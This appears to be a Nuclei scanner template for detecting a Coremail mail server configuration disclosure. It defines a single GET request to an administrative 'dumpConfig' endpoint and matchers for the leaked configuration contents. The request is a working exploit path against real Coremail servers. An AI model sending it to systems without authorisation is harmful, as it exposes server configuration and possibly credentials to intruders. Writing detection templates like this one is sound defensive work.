id: coremail-config-disclosure

info:
  name: Coremail - Config Discovery
  author: princechaddha
  severity: high
  description: Coremail configuration information was discovered.
  reference:
    - https://www.secpulse.com/archives/107611.html
  metadata:
    max-request: 1
  tags: Coremail-邮件系统

http:
  - method: GET
    path:
      - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<object name=\"cm_md_db\">"
          - 'containerDefinitions'
          - '<string name="User">coremail</string>'
          - '<string name="EnableCoremailSmtp">'
        condition: or

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100a933f66f20dfcc2d371ec242220500567b8d7a74265d8d3f5617dda78fdc5da6022100cdbff71d832b672411cafdaef856fc940d0e4b56c7d00e71ae1a6a28d7a4787e:922c64590222798bb761d5b6d8e72950
